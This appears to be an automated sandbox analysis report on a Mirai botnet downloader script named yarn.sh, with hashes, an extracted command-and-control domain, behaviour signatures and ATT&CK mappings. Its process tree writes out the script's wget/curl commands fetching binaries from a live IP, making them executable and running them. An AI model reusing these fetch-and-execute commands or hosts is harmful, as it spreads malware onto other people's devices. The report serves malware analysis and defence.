Analysis
-
max time kernel
20s -
max time network
66s -
platform
debian-9_armhf -
resource
debian9-armhf-20240418-en -
resource tags
-
submitted
17-12-2024 15:07
General
-
Target
yarn.sh
-
Size
2KB
-
MD5
156f8033151bacfe7fbd2b38e8ed8230
-
SHA1
8e2424caff27c90c3792ebc7a3d3312f9ad31474
-
SHA256
504bc166321b9ccec043667881ef760fd04bb85c1ea8fa0e9fcfb44f356ea60f
-
SHA512
dd1623dd530087ea2b2f3d554807d1a8e5d3914a8ecdd61433d9f64a4f585afcc7fd8a3ffcb7237363842b722cced8c5d34f60b631349cd73cfbd674c99cb534
Malware Config
Extracted
mirai
UNSTABLE
servers.vlrt-gap.com
Extracted
mirai
UNSTABLE
Extracted
mirai
UNSTABLE
servers.vlrt-gap.com
Extracted
mirai
UNSTABLE
servers.vlrt-gap.com
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 9 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Deletes itself 2 IoCs
-
Executes dropped EXE 9 IoCs
-
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Writes file to system bin folder 4 IoCs
-
Changes its process name 2 IoCs
-
Checks CPU configuration 1 TTPs 9 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 18 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 19 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/yarn.sh/tmp/yarn.sh1⤵
- Writes file to tmp directory
-
/usr/bin/wgetwget http://185.196.11.47/zmap.x862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.x862⤵
-
-
/bin/chmodchmod +x systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-DrNRK0 WTH yarn.sh zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/catcat zmap.mips2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod +x systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-DrNRK0 WTH yarn.sh zmap.mips zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.mpsl2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.mpsl2⤵
-
-
/bin/chmodchmod +x systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-DrNRK0 WTH yarn.sh zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arm2⤵
-
-
/bin/chmodchmod +x systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-DrNRK0 WTH yarn.sh zmap.arm zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm52⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arm52⤵
-
-
/bin/chmodchmod +x systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-DrNRK0 WTH yarn.sh zmap.arm zmap.arm5 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm62⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arm62⤵
-
-
/bin/chmodchmod +x systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-DrNRK0 WTH yarn.sh zmap.arm zmap.arm5 zmap.arm6 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm72⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arm72⤵
-
-
/bin/chmodchmod +x systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-DrNRK0 WTH yarn.sh zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Writes file to system bin folder
- Changes its process name
- Reads system network configuration
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.ppc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.ppc2⤵
-
-
/bin/chmodchmod +x systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-DrNRK0 WTH yarn.sh zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.m68k2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.m68k2⤵
-
-
/bin/chmodchmod +x systemd-private-6aaa57480b2c430fa38db9d8e082a72f-systemd-timedated.service-DrNRK0 WTH yarn.sh zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH yarn.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.spc2⤵
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
94KB
MD58ae4ac18a3b34fba963f59a42ff02fb7
SHA1e9f75cf21972b2c953163d64d3cb89bd6a93cc1b
SHA256c485a846f4b7c5d410762291758175ca0775ca919da52ef05047f3000045020a
SHA512af6a9fb41fc94fdb3c1448e2477190f403b14eca2502e93c1ab6a1c8cf0eaada47dedd81df94f15bc6efa8ae29d68f3a6368c67283514c88f3f8e28519bf6bb0
-
Filesize
94KB
MD5d81e9564b8b9d62d70bda936d927d875
SHA142706a08b0545984ed5a5cfbdff3fe2ab62ca552
SHA256c14fead55aee69ec760fdba5f5371922595ad9df3c7201feb088f322043def0d
SHA512282a8641c62e67b1bde30e1bfbd991493c38155b6dfdb5406a80d69b7b710bfe27fdbe5571363c3f55e2fbb0a447db3789c5609493e24daef3260c2d87417886
-
Filesize
74KB
MD59784e8db8dae548a6593644e3a168579
SHA1afa7c4ce4b0122ec5f22dc37aa7658f41cb01008
SHA2564278fcf8ef5692822cc5eccce4857b5132f8d029949b83925a7a1e6f5c969129
SHA5127f48ae6e910f87f70995c6373083c534670e2f66310e51e8a0b43bc01a31327e33a992b3ad50bc4956e4c9fb3c0845e6ca6aca2dbb014e66487a8338efe2eb6c
-
Filesize
49KB
MD5241482e2337afd65af97770b37d5c90d
SHA1c52137309238b4f1badf1e7bf01197bc48cd00fc
SHA25601d39c861837c2f70e59a1e0af94249269813cfa8dc2696d095d36db84fcf7ca
SHA512cf3fbd84e7664d26a5cdbec8fb195d28438aca00c62b3428fd6d4c4ab7cb781d5816afa6eb046def918efc73059192683ba313c06fec2231cc6cff8610d29a00
-
Filesize
152KB
MD542d179f455f0cce3d90ba52cda6d699d
SHA15d23245cc6a4e167f1f0c60634d4c9a2a04807e6
SHA2563f1df9d60387251d6b937ff15211c555b4c64a702f568a727e68a0b94e729a77
SHA51221286a7571e33066502188147e25f910dcda146df34a672a167eaa9705a7cbe2dd11a7f83291f3786f866abe5cc9e88c612d7d7c27dfd5b920714fffb6ad2d77
-
Filesize
61KB
MD5d1f752879420a6d45d76f130281392d6
SHA146a92c0efae33b8a826dc48daa3dbf3d30be4a15
SHA2564fc42ee2d91d577e0bcc49c27d5f3936584ad49c27b5032baa57a6c6e53b4914
SHA51291e7beb1157bf75f4e73459eb2ab003005aa591848698451ee6dc79764570bf2d8a253c25dda6346b657367844048cd21be38b6485d169e373e8455b2d586225